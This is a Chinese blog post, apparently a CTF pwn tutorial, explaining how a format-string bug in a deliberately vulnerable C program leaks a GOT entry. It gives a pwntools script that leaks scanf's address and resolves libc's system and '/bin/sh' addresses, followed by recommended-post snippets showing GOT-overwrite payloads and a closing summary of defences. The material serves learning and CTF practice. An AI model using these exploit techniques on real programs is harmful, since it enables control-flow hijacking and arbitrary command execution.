格式化字符串漏洞泄露got表

最新推荐文章于 2025-03-23 09:40:01 发布
原创 最新推荐文章于 2025-03-23 09:40:01 发布 · 869 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #pwn

本文介绍了一种通过PWN技术利用格式化字符串漏洞来泄露内存中特定地址的方法,并展示了如何利用这一技巧获取__isoc99_scanf的真实地址。 
#include <stdio.h>
int main() {
  char s[100];
  scanf("%s", s);
  printf(s);
  return 0;
}

编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c
泄露的payload先贴出来,再理解

# coding:utf-8
from pwn import*
from LibcSearcher import *

context.log_level = 'debug'

sh = process('./fmt')
elf = ELF('./fmt')

scanf_got_addr = elf.got['__isoc99_scanf']
print(hex(scanf_got_addr))

payload = p32(scanf_got_addr) + '%7$s'

# pause()
sh.sendline(payload)
# 泄露scanf的真实地址
scanf_addr = u32(sh.recv()[4:8])
print hex(scanf_addr)

# libc操作
libc = LibcSearcher('__isoc99_scanf', scanf_addr)
libc_base = scanf_addr - libc.dump('__isoc99_scanf')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

sh.interactive()

gdb断点在printf
1

理解一下,字符串偏移7,所以payload为got偏移+%7$s,这边用’s而不是’p’,在于got表记录内容也是个指针,%s直接解引用,返回内容:got表偏移+真实地址,所以 u32(sh.recv()[4:8])
1

格式化字符串漏洞
2301_79215333的博客
03-19 1757
格式化字符串函数是根据格式化字符串来进行解析的。对于这样的例子,在进入 printf 函数的之前 (即还没有调用 printf),栈上的布局由高地址到低地址依次如下在进入 printf 之后,函数首先获取第一个参数,一个一个读取其字符会遇到两种情况如果没有字符,报错如果下一个字符是 %, 输出 %否则根据相应的字符,获取相应的参数,对其进行解析并输出那么假设,此时我们在编写程序时候,写成了下面的样子此时我们可以发现我们并没有提供参数,那么程序会如何运行呢?
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 1716
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
格式化字符串之在栈上修改got,执行system(“/bin/sh“)
fzucaicai的博客
03-05 1206
举个例子, payload = fmtstr_payload(7 , {printf_got : system_addr}) 其中,7。
ret2shellcode 的泄露puts@got
wing_7的博客
10-08 1320
现在rip在main+4处没执行puts,执行puts 后可以看到puts_got=> 0X601018里保存的是0X7FFDAA4E5430,可以使用ni si 进行调试看是否前后值有变化。手动设置栈上的值 发现 pop_rdi_ret设置的值 变换为0x4006f3 =》0x7fff004006f3(原因不明)发现read@got.pltb保存了read函数的blic中的地址。call read—> read的plt —>read的got。jmp到的其实这是plt对应函数的got
栈上格式化字符串漏洞总结
weixin_66751120的博客
02-04 3043
例如printf(s),这就是个漏洞函数,那么正确形式应该是printf('%s',s),即以字符串形式输出,那么存在漏洞的原因就是就是没有格式化字符,这时候如果我们在漏洞函数上边输入一个格式化字符,比如%p,那么就会泄露指定位置的地址。因为当程序进行printf函数时,第一个参数是格式化字符,来确定下面一个数据的打印形式。下面是一些格式化字符代的意思。
printf 格式化 输出_64位格式化字符串漏洞修改got利用详解
weixin_39631295的博客
11-27 1554
前言格式化字符串漏洞是最基础也是很老的一个漏洞了,网上一搜索就会有一堆的解释、原理、以及利用,但全都是对32位的格式化漏洞的解析,64位的几乎没有,就算有也被一笔带过。但是当你利用格式化漏洞来修改64位elf的got时,你会发现并没有详细的那么简单,虽然和32位的原理一样,但payload的构建方法却有所差别。甚至难度也大大增加故此有了此处尝试以及尝试后的一些总结漏洞分析程序源码:#...
[BJDCTF 2nd]r2t4 [格式化字符串GOT]
、moddemod
06-24 480
开启了Canary,但Canary失败的处理逻辑会进入到stack_chk_failed函数,stack_chk_failed函数是一个普通的延迟绑定函数,可以通过修改GOT劫持这个函数。 exp from pwn import * context(log_level='debug') proc_name = './r2t4' p = process(proc_name) # p = remote('node3.buuoj.cn', 29985) elf = ELF(proc_name) __...
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串got
mcmuyanga的博客
01-27 3313
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
格式化字符串漏洞1
08-04
格式化字符串漏洞】是一种常见的安全问题,常见于C语言编程环境,特别是在使用`printf`和`scanf`家族函数时。这种漏洞发生的原因是程序在处理格式化字符串时,允许外部输入来控制输出或者错误地处理了参数类型,...
字符串格式化漏洞修改GOT一例
Carrot_kexin的博客
10-17 1167
代码如下: from pwn import * context(arch='amd64', os='linux') elf = ELF("./pwn") io = remote("111.200.241.244", 56315) catflag_addr = 0x4008DA puts_got = elf.got['puts'] payload = fmtstr_payload(6, {puts_got: catflag_addr}) io.recvuntil("3. Exit the battle") i
pwn7(利用格式化字符串泄露libc)
2401_87427870的博客
01-25 742
手动计算偏移,偏移量为%51$p时是canary,为%53$p时就可以计算出libc。格式化字符串漏洞的考察。
栈溢出——一种经典的got泄露解法
qq_47841160的博客
11-21 770
如果是第一次调用,.got.plt中存储的是.plt中下一条指令的地址,此时,程序会通过一系列执行将真正的函数入口地址填充入.got.plt中,这时候如果有办法拿到这个地址我们就可以通过该地址爆破出对应的依赖并获得重要的system函数地址和/bin/sh字符串地址。命令执行结果如下图所示。如上图所示可以看到该题是一个64位程序,没有RELRO,cannary和PIE防护,栈不可执行,这意味着.got.plt可以修改,溢出时不需要考虑获取特殊的标志,.plt和.got.plt在内存中的地址已知。
格式化字符串泄露
tianxi blog's
05-04 505
got地址 如果要通过格式化字符串泄露出某个函数的got地址,需要使用格式化字符串来打印出来,而不能去直接通过: puts_got = elf.got['puts'] 把 puts_got 当做参数传到: libc = LibcSearcher('puts',puts_addr) 去查找 libc,因为 elf.got 获取的是 puts 函数的 got 地址地址,而不是 got ...
好好说话之格式化字符串漏洞利用
hollk’s blog
08-05 4615
编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 一、格式化字符串漏洞利用 格式化字符串漏洞两大利用手段: 是程序崩溃,因为%s对应的参数地址不合法的概率比较大 查看进程内容,根据%d,%f输出了栈上的内容 二、程序崩溃 一般输入若干个%s即可 %s%s%s%s%s%s%s%s%s%s%s%s%s%s 栈上不可能每个值都对应了合法地址,总会有某个地址可以使得程序崩溃,不能控制,但是可以玩坏。例如,如果远程服务有个格式化字符串漏洞,那么就可以攻击其可用性,使服务崩溃,进而使
格式化字符串泄露canary+ret2libc
最新发布
qq_41710399的博客
03-23 1038
264/8=33,因为是六十四位文件所以他格式化字符串时候前六个参数是在寄存器中的而栈空间这个记录的第一个偏移其实是真实的第七个数据单元所以这边算出来33还要再加6,即为canary值,利用格式化字符串泄露内存的payload应该为(%39$p)接下来再本地run一下看看。这边泄露出来libc基地址需要用puts真实地址减去偏移量,即为基地址,每次运行程序偏移量是不变的是固定的所以这边可以利用动调获取到puts的真实地址和基地址计算偏移量,这边有两个函数。
pwn刷题num47---off by one 修改size大小,造成堆块重叠,控制chunk内容指针,泄露函数真实地址,修改got,调用system
tbsqigongzi的博客
05-04 600
BUUCTF-PWN-hitcontraining_heapcreator 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got仍可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE----函数地址为真实地址 动态链接 运行一下试试 功能基本上就是 1. 创建堆 2. 编辑堆 3.显示堆 4.删除堆 5.退出 ida看一下伪代码 主函数就是根据选择调用不
linux 格式化字符串漏洞
sky123博客
02-04 2641
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列格式化输出到stdout vfprintf 根据参数列格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列格式化输出到字符串 vsnprintf 根据参数列格式化输出指定字节到字符串 常用格式化字符串形式 %[p
泄露libc
inquisiter
01-12 1689
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT可写,但是程序使用的是printf_chk函数。会检测出形如&amp;quot;%n&amp;quot;和&amp;quot;%12$p&amp;quot;这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞泄露出libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
简单格式化字符串漏洞
2301_81031055的博客
02-19 745
经过分析之后,我们可以通过格式化字符串漏洞将puts函数的got改成main函数,这样的话,当程序执行puts函数的时候实际上是执行main函数,就会再次利用read函数以及printf函数。接下来我们先寻找函数的偏移(指令为:AAAA%p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p)通过调试会发现偏移为11,此时打印出来的就为canary的地址,然后我们发送v4的时候将canary发送过去就会获取后门。
格式化字符串漏洞总结体会
03-23
<think>好的,我现在需要帮助用户总结格式化字符串漏洞的相关知识,包括经验、体会和安全防护措施。首先,我得回忆一下用户提供的引用内容,看看有哪些关键点需要涵盖。 根据用户提供的引用,格式化字符串漏洞主要涉及不安全的函数使用,比如printf、sprintf等,如果用户输入直接作为格式化字符串参数,就会导致漏洞。引用里提到,攻击者可以利用这个漏洞读取内存或执行任意代码[^2][^3][^4]。防护措施方面,引用[1]提到使用安全的函数和输入验证是关键。另外,引用[4]还提到通过泄露地址实现攻击的例子,所以防护需要包括地址随机化(ASLR)等措施。 接下来,我需要整理这些信息,分点说明漏洞原理、攻击方式、经验总结和防护措施。可能需要先解释什么是格式化字符串漏洞,然后讲攻击手段,再总结防护方法。同时,用户要求使用中文回答,并且按照系统级指令处理数学公式,不过这个问题可能涉及较少数学内容,主要关注代码和内存相关的内容。 还要注意生成相关问题,用户示例中有三个问题,我需要根据内容提出相关问题,比如漏洞原理、防护方法、实际案例等。确保问题与总结的内容相关,并且能够帮助用户进一步学习。 需要检查是否遗漏了引用中的要点,比如输入验证、安全函数的使用(如snprintf代替sprintf)、编译器保护机制(如-FORTIFY_SOURCE)[^1][^4]。另外,引用[3]提到格式化字符串的定义,这部分可以放在原理部分解释。 最后,确保回答结构清晰,分点明确,语言通顺,符合用户的要求。同时,正确标注引用,比如在提到输入验证时引用[1],提到攻击示例时引用[2][4]。</think>### 格式化字符串漏洞总结 #### 1. **漏洞原理** 格式化字符串漏洞源于程序中未正确控制格式化字符串参数,允许攻击者控制或注入格式化规定字符(如 `%s`、`%x`、`%n`)。常见于使用 `printf`、`sprintf` 等函数时,直接将用户输入作为格式化字符串参数,例如: ```c printf(user_input); // 危险!若 user_input 包含 %s 或 %n 等符号 ``` 攻击者可利用此漏洞**读取内存**(如通过 `%x` 泄露栈数据)、**修改内存**(通过 `%n` 写入任意地址)或**执行任意代码**[^4]。 --- #### 2. **攻击方式与危害** - **信息泄露**:使用 `%s`、`%p` 等读取栈或全局偏移GOT)中的敏感数据,例如获取 `system` 函数地址[^4]。 - **内存篡改**:通过 `%n` 向指定地址写入数据,可能覆盖返回地址或函数指针。 - **代码执行**:结合内存泄露和写入操作,构造ROP链或劫持控制流[^2]。 --- #### 3. **经验总结与防护措施** **关键防护方法:** 1. **输入验证**:严格校验用户输入,禁止包含未经验证的格式化字符(如 `%`)。 2. **使用安全函数**:优先使用 `printf("%s", user_input)` 而非 `printf(user_input)`,避免直接传递用户输入作为格式化字符串。 3. **编译器保护**:启用 `-Wformat-security` 编译选项,检测不安全的格式化字符串用法;使用 `-D_FORTIFY_SOURCE=2` 强化缓冲区检查。 4. **内存保护机制**:开启地址随机化(ASLR)和栈保护(Stack Canary),增加攻击难度。 **实践案例:** - 在存在漏洞的函数中,通过 `%s` 泄露GOT地址,结合 `system` 函数实现任意命令执行[^4]。 - 使用 `snprintf` 替代 `sprintf`,限制输出缓冲区大小,防止溢出。 --- #### 4. **体会与建议** - **代码审查重点**:检查所有使用格式化字符串的函数(如 `printf`、`fprintf`),确保参数可控。 - **自动化工具辅助**:利用静态分析工具(如Coverity)扫描潜在漏洞。 - **最小权限原则**:限制程序运行权限,降低漏洞被利用后的影响范围。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值